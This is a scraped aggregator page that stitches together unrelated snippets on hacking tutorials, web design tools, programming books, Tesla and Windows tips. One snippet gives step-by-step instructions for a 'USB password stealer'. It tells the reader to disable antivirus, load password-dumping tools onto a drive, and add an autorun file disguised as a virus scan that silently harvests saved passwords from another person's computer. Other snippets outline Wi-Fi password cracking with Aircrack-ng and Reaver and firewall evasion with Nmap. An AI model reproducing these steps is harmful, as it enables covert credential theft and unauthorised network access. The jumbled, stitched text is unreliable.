background preloader

Password Secrets of Popular Windows Applications

Password Secrets of Popular Windows Applications

80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques. Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and positive attitude towards problem solving. If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Hacking For Dummies - Beginners Tutorials Summary

40 Online Generators for Web Designers Should Bookmark Online Generators for Web Designers can be a great way to save time in your web design projects. High-quality generators can create graphics or code or even layouts in a matter of seconds or minutes, things that might take an hour or more if done by hand. Online generator are those tools that help us to create those popular “XHTML valid” CSS banners, micro buttons or css website templates in seconds. In such cases online generators can be of great help which do the necessary job and some tools don’t have to be downloaded also. We all know that backgrounds play a crucial role in a design. Web Designers sometimes spend a lot of time in making pattern or stripe backgrounds and there are also tool to help you out here. Advertisement 1. XML /SWF charts are used to create attractive graphs and charts from XML data, Create a source either manually or generate dynamically then pass it to the XML chart’s flash file. 2. 3. 4. 256 Pixels 5. 80 x 15 brilliant Button Maker 6. 7. 8. 9. 10. 11. 12. 14.

Usb password stealer - Steal passwords on a Remote computer As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.Things you will need? Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:Note:Kindly disable your antivirus before performing these steps1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from 3. start iepv.exe /stext iepv.txt

Become a Programmer, Motherfucker If you don't know how to code, then you can learn even if you think you can't. Thousands of people have learned programming from these fine books: Learn Python The Hard Way Learn Ruby The Hard Way Learn Code The Hard Way I'm also working on a whole series of programming education books at learncodethehardway.org. Learn C The Hard Way Learn SQL The Hard Way Graphics Programming Language Agnostic NerdDinner Walkthrough Assembly Language Bash Clojure Clojure Programming ColdFusion CFML In 100 Minutes Delphi / Pascal Django Djangobook.com Erlang Learn You Some Erlang For Great Good Flex Getting started with Adobe Flex (PDF) Forth Git Grails Getting Start with Grails Haskell Java JavaScript JavaScript (Node.js specific) Latex The Not So Short Introduction to LATEX (perfect for beginners) Linux Advanced Linux Programming Lisp Lua Programming In Lua (for v5 but still largely relevant)Lua Programming Gems (not entirely free, but has a lot of free chapters and accompanying code) Maven Mercurial Nemerle Nemerle NoSQL Oberon Objective-C

Hack-A-Vision: Cracking WEP/WPA/2 networks with Aircrack-ng [Linux] Now that you have hopefully installed the Aircrack-ng suite and familiarized yourself with some basic Linux commands, we can start cracking WEP and WPA1/2 networks to see the differences in security Wired Equivalent Privacy (WEP) and Wi-fi Protected Access (WPA) provide. Notice: This is purely for educational value, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught. Now, lets start. Open up a new terminal and lets begin (all typed commands are underlined; read the notes section for optional commands): Make sure you have a "monitoring" interface, this means that your network interface (the thing that interacts with networks) can scan for open/encrypted networks. For further in-depth reading on cracking WEP networks, check out this paper. The aircrack-ng suite includes the below programs, try playing around with them.

Drinkhacker.com | The Essential Blog for the Discriminating Drinker Nmap Evade Firewall & Scripting Nmap is the most powerful scanner that is used to perform so many functions including port scanning, service detection, and even vulnerability detection. Nmap from beginner to advanced has covered many basic concepts and commands, and in this second part of this series of articles I will discuss some advanced techniques of Nmap. How to Evade a Firewall/IDS Firewalls and IDS (intrusion detection systems) normally play an important role to defend the remote target very well from a security point of view because these hardwares and softwares are capable of blocking the intrusion, but in the case of penetration testing you need to bypass these tools to get the right result otherwise you will be misled. Nmap can scan the firewall and other intrusion detection systems on the remote target computer, as it uses different types of techniques to fight against these softwares and the techniques are dependent on the remote software. TCP ACK Scan (-sA) Fragment Packets (-f) Spoof MAC Address Http-enum

A to Z of C - Beta | Online book on C/DOS programming 1. First Chapter 1.1 Acknowledgement 1.2 Book Organization 1.3 FAQ about A to Z of C 2. 3.1 Indian Hill Style 3.2 Hungarian Coding Style 3.3 WAR (Wesley And Rajesh) Coding Style Part I ANSI C 4. 4.1 Myth & Mistakes 4.2 Tips for better Programming 4.2.1 Coding Style 4.2.2 Boolean Variables 4.2.3 How to code better? 5. main( ) and Mistakes 5.1 What main( ) returns? 6. 6.1 Example 6.2 Frequently Asked Undefined Questions 7. 7.1 Swap Macro 7.2 Flip and Flop 7.3 Crypting with XOR 8. 8.1 strlen( ) 8.2 strcpy( ) 8.3 strcat( ) 8.4 strcmp( ) 9. 9.1 Factorial 9.2 Fibonacci 9.3 GCD 9.4 Power 9.5 Reverse Printing 9.6 Decimal to binary conversion 9.7 Decimal to hexadecimal conversion 9.8 Printing a decimal in words 10. 10.1 Power of 2 10.2 Prime Numbers 10.3 Roman Letters [convert Arabic numerals to Roman numerals] 10.4 Day of Week 10.5 Calendar 10.6 Memory-Swap 10.7 Block Structure 10.7.1 Swap macro using Block Structure 10.8 Printf with %b 11. 12. 13. 13.1 Where to contest? Part II DOS Programming 14.

ophcrack | Free Development software downloads The 50 Best How-To Geek Windows Articles of 2010 Even though we cover plenty of other topics, Windows has always been a primary focus around here, and we’ve got one of the largest collections of Windows-related how-to articles anywhere. Here’s the fifty best Windows articles that we wrote in 2010. Want even more? You should make sure to check out our top 20 How-To Geek Explains topics of 2010, or the 50 Windows Registry hacks that make Windows better. How to Customize Your Windows 7 Taskbar Icons for Any App Would you like to change out the icons on your taskbar with a beautiful set of icons that all go together? How to Customize Your Windows 7 Taskbar Icons for Any App Change the Windows 7 Taskbar Color Sure, you can hack Windows and install a custom theme if you really wanted to, or pay for a software package to do it for you. Change the Windows 7 Taskbar Color With No Extra Software (Stupid Geek Tricks) Change Your Windows 7 Taskbar Color the Easy Way (and Rotate Between Colors) How to Crack Your Forgotten Windows Password

101 Free Admin Tools We know administrators love tools that make life easier – especially when they’re free! So here are 101 of them! System and network analysis 1. Using this MMC snap-in you can quickly visualize the user and group permissions of a local or remote folder or drive in a hierarchical format to help identify problems. 2. Wi-Fi Inspector is a powerful Wi-Fi management and troubleshooting tool that allows you to locate and verify Wi-Fi devices, detect rogue Access Points, troubleshoot connections, and search for Wi-Fi networks. 3. Whois performs a lookup of the registration information of a given IP address or domain name. 4. ShareEnum allows you to scan and view the security settings of file shares on your network. 5. 6. 7. 8. 9. Tesla - Master of Lightning: A Weapon to End War Tesla inherited from his father a deep hatred of war. Throughout his life, he sought a technological way to end warfare. He thought that war could be converted into, "a mere spectacle of machines." In 1931 Tesla announced to reporters at a press conference that he was on the verge of discovering an entirely new source of energy. Asked to explain the nature of the power, he replied, "The idea first came upon me as a tremendous shock... I can only say at this time that it will come from an entirely new and unsuspected source." War clouds were again darkening Europe. The idea generated considerable interest and controversy. By 1937 it was clear that war would soon break out in Europe. What set Tesla's proposal apart from the usual run of fantasy "death rays" was a unique vacuum chamber with one end open to the atmosphere. Of all the countries to receive Tesla's proposal, the greatest interest came from the Soviet Union.

How To Crack A Wi-Fi Network’s WPA Password With Reaver Your Wi-Fi network is your convenient wireless gateway to the internet, and since you’re not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol. Here’s the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers’ current passwords with relative ease. Here’s how to crack a WPA or WPA2 password, step by step, with Reaver — and how to protect your network against Reaver attacks. In the first section of this post, I’ll walk through the steps required to crack a WPA password using Reaver. First, a quick note: As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn’t mean you should be a jerk, or do anything illegal.

Related: